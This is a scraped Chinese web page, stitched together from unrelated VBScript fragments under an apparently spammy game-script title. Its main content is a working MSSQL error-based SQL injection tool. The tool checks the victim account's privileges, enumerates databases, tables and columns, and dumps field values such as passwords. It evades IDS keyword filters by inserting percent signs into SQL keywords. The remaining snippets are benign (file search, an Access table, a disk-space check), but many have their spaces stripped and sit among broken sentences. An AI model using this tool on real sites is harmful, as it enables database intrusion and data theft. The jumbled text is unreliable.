逃跑吧少年钻石脚本ae导入

因为Variant是VBScript中唯一的数据类型,所以它也是VBScript中所有函数的返回值的数据类型set arg=wscript.arguments If (LCase(Right(Wscript.fullname,11))="Wscript.Exe") Then Wscript.Quit End If if arg.count=0 then usage() Wscript.Quit End If Sub usage() wsh.echo string(79,"*") wsh.echo "暂且只支持mssql显错模式,直接写url为数字型,写url'为字符型,url里有&请用双引号包含url" wsh.echo "sqlids v0.7 for mssql2000 with error by lcx" wsh.echo "以下两个脚本可互相参考" wsh.echo "" wsh.echo "" wsh.echo "Usage:" wsh.echo "cscript "&wscript.scriptname&" url limit ||----------->得到当前权限"&vbcrlf&"Ex:cscript sql.vbs limit" wsh.echo "cscript "&wscript.scriptname&" url dbname ||----------->得到全部库名"&vbcrlf&"Ex:cscript sql.vbs dbname" wsh.echo "cscript "&wscript.scriptname&" url table 库名||-------->得到所给库的全部表名"&vbcrlf&"Ex:cscript sql.vbs table master" wsh.echo "cscript "&wscript.scriptname&" url filed 库名 表名 ||---------->得到所给库所给表的全部字段"&vbcrlf&"Ex:cscript sql.vbs id=1 filed master spt_server_info" wsh.echo "cscript "&wscript.scriptname&" url result 字段名 库名 表名||--->得所给库、表、字段的字段值"&vbcrlf&"Ex:cscript sql.vbs id=1 result id master sysinfo" wsh.echo "cscript "&wscript.scriptname&" url search 你要查找的字段名||--->根据关键字查找字段"&vbcrlf&"Ex:cscript sql.vbs search pass" wsh.echo string(79,"*")&vbcrlf end Sub Function getHTTPPage(Path) t=GetBody(Path) getHTTPPage=BytesToBstr(t, "GB2312") End Function Function UrlEncode(str) str=Replace(str," ","%20") UrlEncode=str End Function Function GetBody(url)' xml得到网页源码,可以改成cookie或get提交 On Error Resume Next Aurl=Split(url,"?") '这是为post提交的 Set Retrieval=CreateObject("Microsoft.XMLHTTP") With Retrieval .Open "post", Aurl(0), False, "", "" .setRequestHeader "Content-Type", "application/x-www-form-urlencoded" .setRequestHeader "Accept-Encoding", "gzip, deflate" .setRequestHeader "User-Agent", "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; .NET CLR 1.1.4322)" .setRequestHeader "Connection", "Keep-Alive" .setRequestHeader "Cache-Control", "no-cache" .Send UrlEncode(Aurl(1)) 'post提交 GetBody=.ResponseBody .abort End With Set Retrieval=Nothing End Function Function BytesToBstr(Body, Cset) Dim objstream Set objstream=CreateObject("adodb.stream") objstream.Type=1 objstream.Mode=3 objstream.Open objstream.Write Body objstream.Position=0 objstream.Type=2 objstream.Charset=Cset BytesToBstr=objstream.ReadTExt objstream.Close Set objstream=Nothing End Function Function ReplaceKeyWord(Value)'绕过ids过虑 Table="select->se%lect|[k]|insert->in%sert|[k]|update->u%pdate|[k]|delete->dele%te|[k]|drop->dr%op|[k]|alter->al%ter|[k]|create->crea%te|[k]|inner->in% ner|[k]|join->jo%in|[k]|from->fro%m|[k]|where->w%here|[k]|union->unio%n|[k]|group->grou%p|[k]|by->b%y|[k]|having->hav%ing|[k]|table->tab%le|[k]|shutdown- >shu%tdown|[k]|kill->k%ill|[k]|declare->dec%lare|[k]|open->o%pen|[k]|pwdencrypt->pwdencr%ypt|[k]|msdasql->m%sdasql|[k]|sqloledb->sqlo%ledb|[k]|char->c%har| [k]|fetch->fe%tch|[k]|nExt->ne%xt|[k]|allocate->al%locate|[k]|sys->s%ys|[k]|raiserror->raiser%ror|[k]|Exec->e%xec|[k]|=!->=%!|[k]|--->-%-|[k]|xp_->x%p_|[k] |sp_->s%p_|[k]|and->a%nd" Dim i, Relpacement, Temp Relpacement=Split(Table, "|[k]|") ReplaceKeyWord=Value For i=0 to UBound(Relpacement) Temp=Split(Relpacement(i), "->") If UBound(Temp)=1 Then ReplaceKeyWord=Replace(ReplaceKeyWord, Temp(0), Temp(1)) NExt End Function Function result(sHTMLTEMP) '用varchar做关键字分隔网页内容,用正则帅一点,可惜不太会 aHTML=Split(sHTMLTEMP, "varchar") If(UBound(aHTML) > 0)Then sHTMLTEMP=aHTML(1) aHTML=Split(sHTMLTEMP, "'") sHTMLTEMP=aHTML(1) End If result=sHTMLTEMP End Function Function Str2HEx(strHEx)'sql的16进制转换函数 Dim sHEx For i=1 To Len(strHEx) sHEx=sHEx & HEx(Asc(Mid(strHEx,i,1)))&"00" NExt Str2HEx="0x"&sHEx End Function Function Str2HExtwo(strHEx)'sql的16进制转换函数 Dim sHEx For i=1 To Len(strHEx) sHEx=sHEx & HEx(Asc(Mid(strHEx,i,1))) NExt Str2HExtwo="0x"&sHEx End Function Function MoveR(Rstr) '去重复 Dim i,SpStr SpStr=Split(Rstr,",") For i=0 To Ubound(Spstr) If I=0 then MoveR=MoveR & SpStr(i) & "," Else If instr(MoveR,SpStr(i))=0 and i=Ubound(Spstr) Then MoveR=MoveR & SpStr(i) Elseif instr(MoveR,SpStr(i))=0 Then MoveR=MoveR & SpStr(i) & "," End If End If NExt End Function function page(sql) page=Replace(getHTTPPage(url&" "&ReplaceKeyWord(sql)),Chr(34),"") End Function url=arg(0) injection=arg(1) '--------------------------------------以下代码是注入语句,完全不需要引号 select case arg(1) Case "limit" body=Replace(getHTTPPage(url),Chr(34),"") '语句单独提出来,方便以后修改,第一条是sa,第二条是DB_owner sqlone="and (select is_srvrolemember(0x730079007300610064006D0069006E00))>0--" sqltwo="and (select is_member(0x640062005F006F0077006E0065007200))>0--" Bodyone=page(sqlone) bodytwo=page(sqltwo) wsh.echo "当前信息:" If Len(body)=Len(Bodyone) Then wsh.echo "SA" If Len(body)=Len(Bodytwo) And Len(body)<>Len(Bodyone) Then wsh.echo "DB_owner" Else wsh.echo "PUBLIC" End If sqlthtree="and @@servername>0--|and @@version>0--|and user>0--|and db_name()>0--" rtemp=Split(sqlthtree,"|") servername=result(page(rtemp(0))) version=result(page(rtemp(1))) user=result(page(rtemp(2))) db_name=result(page(rtemp(3))) wsh.echo "servername:"&servername wsh.echo "version:"&version wsh.echo "user:"& user wsh.echo "db_name:"& db_name case "dbname" i=1 Do sql="and db_name("&i&")>0--" '暴库名语句 Body=page(sql) k=InstrRev(body,"varchar", -1, 0) i=i+1 If k<>0 Then wscript.echo result(body) Else wsh.echo "========over============" End if Loop Until k=0 case "table" i=1 Do ' 表名语句 agr(2)表示库 sql="and 0<>(select top 1 name from "&arg(2)&".dbo.sysobjects where xtype=0x7500 and name not in (select top "& i &" name from "&arg(2)&".dbo.sysobjects where xtype=0x7500))--" Body=page(sql) k=InstrRev(body,"varchar", -1, 0) i=i+1 If k<>0 Then wscript.echo result(body) Else wsh.echo "========over============" End if Loop Until k=0 case "filed" sqlbiaoid="an%d (se%l%e%c%t to%p 1 ca%st(id as nvarch%ar(20))%2bch%ar(124) fr%om ["&arg(2)&"]..[sy%sob%je%cts] wh%ere name="&Str2HEx(arg(3))&")=0-- " biaoid=result(page(sqlbiaoid)) biaoid=Replace(biaoid,Chr(124),"") sqlclounmcnt="an%d (se%l%e%c%t ca%st(co%unt(1) as varch%ar(10))%2bch%ar(94) fr%om ["&arg(2)&"]..[sys%columns] wh%ere id="&biaoid&")=0-- " k=Replace(result(page(sqlclounmcnt)),Chr(94),"") wsh.echo "共有列名"&k&"个" For i=1 To k sqlfiled=" an%d (se%l%e%c%t to%p 1 ca%st(name as varch%ar(8000)) fr%om (se%l%e%c%t to%p "&i&" colid,name fr%om ["&arg(2)&"]..[sys%columns] wh%ere id="&biaoid&" order by colid) t order by colid desc)=0--" wsh.echo result(page(sqlfiled)) nExt case "result" i=1 sqlcloum="and (select cast(count(1) as varch%ar(8000))%2bchar(94) from ["&arg(3)&"]..["&arg(4)&"] where 1=1)>0--" '暴列的总数目语句 k=result(page(sqlcloum)) k=Replace(k,Chr(94),"") wsh.echo arg(2)&"字段共有记录数"&k&"个"&vbcrlf For i=1 To k sqlneirong="an%d (se%l%e%c%t to%p 1 ca%st("&arg(2)&" as varch%ar)%2bch%ar(94) fr%om (se%l%e%c%t to%p "&i&" ["&arg(2)&"] fr%om ["&arg(3)&"]..["&arg(4) &"] wh%ere 1=1 order by ["&arg(2)&"]) t wh%ere 1=1 order by ["&arg(2)&"] desc )=0--" Body=page(sqlneirong) wscript.echo Replace(result(body),Chr(94),"") Next Case "search" love=Str2HExtwo(arg(2)) wscript.echo "请稍候,正在查循,暂且只列10条,结果显示为'表名|字段名'格式" TimeSpend=Timer For i=1 To 10 '可以根据需要改动这个10 sqlsearch="And (selecttop1t_name%2bchar(124)%2bc_namefrom(selecttop"&i&"object_name(id)ast_name,nameasc_namefromsyscolumnswherecharindEx(cast("&love&"asvarchar(2000)),name)%3E0andleft(name,1)!=0x40orderbyt_nameasc)asTorderbyt_namedesc)>0--" Body=page(sqlsearch) body=result(body) a=a&body&"," NExt TimeSpend=round(Timer - TimeSpend,2) wsh.echo MoveR(a) wsh.echo "用时:" & TimeSpend & "秒." Case Else If arg(1)<>"limit" Or arg(1)<>"dbname" Or arg(1)<>"search" Or arg(1)<>"table" Or arg(1)<>"filed" Then wscript.echo "注意参数" usage() End if end select

shell脚本完成ls的功能 '' ASP/VBScript Dictionary extract' Author: WangYe' For more information please visit' ' This code is distributed under the BSD license'' collection 集合或者字典,可以通过For Each访问的' Request.Form 或者 Request.QueryString' specified 指定必须存在的属性,假如该属性不存在,将自动创建一个' prefix 每个属性的前缀修饰' callback 对于集合或者字典的每个元素(key-value)的值进行函数调用' 函数原型:' Function filter(key, value)' filter=value' End If' 最终值将以该函数返回的值为准' Function extract(collection, ByVal specified, prefix, callback) Dim VarName, VarValue, DynObj, searchKey specified="," & Replace(specified, " ", "") & "," Set DynObj=New DynamicObject For Each key In collection searchKey="," & key & "," If InStr(1, specified, searchKey, 1)>0 Then specified=Replace(specified, searchKey, "") If Left(specified, 1) <> "," Then specified="," & specified End If If Right(specified, 1) <> "," Then specified=specified & "," End If End If VarName=prefix & key VarValue=collection(key) If callback<>"" Then VarValue=GetRef(callback)(key, VarValue) End If DynObj.add VarName, VarValue, PROPERTY_ACCESS_READONLYNext specified_array=Split(specified, ",") Dim i For i=LBound(specified_array) To UBound(specified_array) If specified_array(i)<>"" Then DynObj.add prefix & specified_array(i), "", _PROPERTY_ACCESS_READONLY End If Next Set extract=DynObj.GetObject()End Function3.也可以这样写来打开ActiveMovie控制:Shell"RUNDLL32.EXEamovie.ocx,Rundll",1而用Shell"RUNDLL32.EXEamovie.ocx,Rundll/playX",1将直接播放媒体文件

onerrorresumenext DimkeyWord,DirTotal,TimeSpend,FileTotal,Fso,outFile,txtResult,txtPath,sPath ConstMY_COMPUTER=&H11& ConstWINDOW_HANDLE=0 ConstOPTIONS=0 SetobjShell=CreateObject("Shell.Application") SetobjFolder=objShell.Namespace(My_Computer) SetobjFolderItem=objFolder.Self strPath=objFolderItem.Path SetobjFolder=objShell.BrowseForFolder(WINDOW_HANDLE,"选择你要搜索的文件夹:",OPTIONS,strPath) IfobjFolderIsNothingThen msgbox"您没有选择任何有效目录!" wscript.quit else SetobjFolderItem=objFolder.Self sPath=objFolderItem.Path txtpath=sPath SetFso=wscript.CreateObject("scripting.filesystemobject") FileTotal=0 DirTotal=0 'sPath=left(Wscript.ScriptFullName,len(Wscript.ScriptFullName)-len(Wscript.ScriptName)) 'txtPath=trim(inputbox("你选的目录是"&sPath,"文件搜索",sPath)) keyWord=LCase(inputbox("请输入搜索关键字点Cancel的话会得到目录列表:","文件搜索","mp3")) setoutFile=Fso.createtextfile(sPath&"\SearchResult.txt") outFile.writeline"开始搜索..." outFile.writeline"起启目录:"&txtPath TimeSpend=Timer myFindtxtPath TimeSpend=round(Timer-TimeSpend,2) txtResult="搜索完成!"&vbCrLf&"共找到文件:"&FileTotal&"个."&vbCrLf&"共搜索目录:"&DirTotal&"个."&vbCrLf&"用时:"&TimeSpend&"秒." outFile.writetxtResult msgboxtxtResult&"结果保存在"&sPath&"\SearchResult.txt" outFile.close setoutFile=nothing setFso=nothing SubmyFind(ByValthePath) Dimfso,myFolder,myFile,curFolder Setfso=wscript.CreateObject("scripting.filesystemobject") SetcurFolders=fso.getfolder(thePath) DirTotal=DirTotal+1 IfcurFolders.Files.Count>0Then ForEachmyFileIncurFolders.Files IfInStr(1,LCase(myFile.Name),keyWord)>0Then outFile.WriteLineFormatPath(thePath)&""&myFile.Name FileTotal=FileTotal+1 EndIf Next EndIf IfcurFolders.subfolders.Count>0Then ForEachmyFolderIncurFolders.subfolders myFindFormatPath(thePath)&""&myFolder.Name Next EndIf EndSub FunctionFormatPath(ByValthePath) thePath=Trim(thePath) FormatPath=thePath IfRight(thePath,1)=""ThenFormatPath=Mid(thePath,1,Len(thePath)-1) EndFunction EndifPrivateSubCommand1_Click()OnErrorGoToErr100'定义表与字段DimDefDatabaseAsDatabaseDimDefTableAsTableDef,DefFieldAsFieldSetDefDatabase=Workspaces(0).OpenDatabase(App.Path&"\vbeden.mdb",0,False)SetDefTable=DefDatabase.CreateTableDef("VB编程乐园")'dbBinary=9'dbBoolean=1'dbByte=2'dbChar=18'dbDate=8'dbInteger=3'dbLong=4'dbMemo=12'dbText=10'建立Name字段为8个字符型SetDefField=DefTable.CreateField("Name",dbText,8)DefTable.Fields.AppendDefFieldSetDefField=DefTable.CreateField("Sex",dbText,2)DefTable.Fields.AppendDefField'该字段允许为空DefField.AllowZeroLength=True'建立Age字段为3个的常整型SetDefField=DefTable.CreateField("Age",dbInteger,3)'字段追加DefTable.Fields.AppendDefField'表追加DefDatabase.TableDefs.AppendDefTableMsgBox"VB编程乐园数据库建立完成

Connecting to server …Done. 遵循这个原则,至少能在循环中的每N次反复时才执行DoEvents语句,从而增强效率

'说明 : 通过VBS脚本查看 系统C盘 剩下的空间 'Creator : Eric1991 'Date : 2013-11-4 Set objWMIService=GetObject("winmgmts:") Set objLogicalDisk=objWMIService.Get("Win32_LogicalDisk.DeviceID='c:'") Wscript.Echo cint(objLogicalDisk.FreeSpace / 1024 / 1024 / 1024) & "GB" 如何录制md_click事件引发timer3_time过程,通过逻辑变量1(2)控制文字变化的方式,1(2)=true时使文字渐现,1(2)=false时使文字渐隐那么,如果最后四个字符是.scr会怎样?在这种情况下,我们只关心两种可能:屏幕保护程序启动或屏幕保护程序结束。

42人参与, 0条评论 登录后显示评论回复

你需要登录后才能评论 登录/ 注册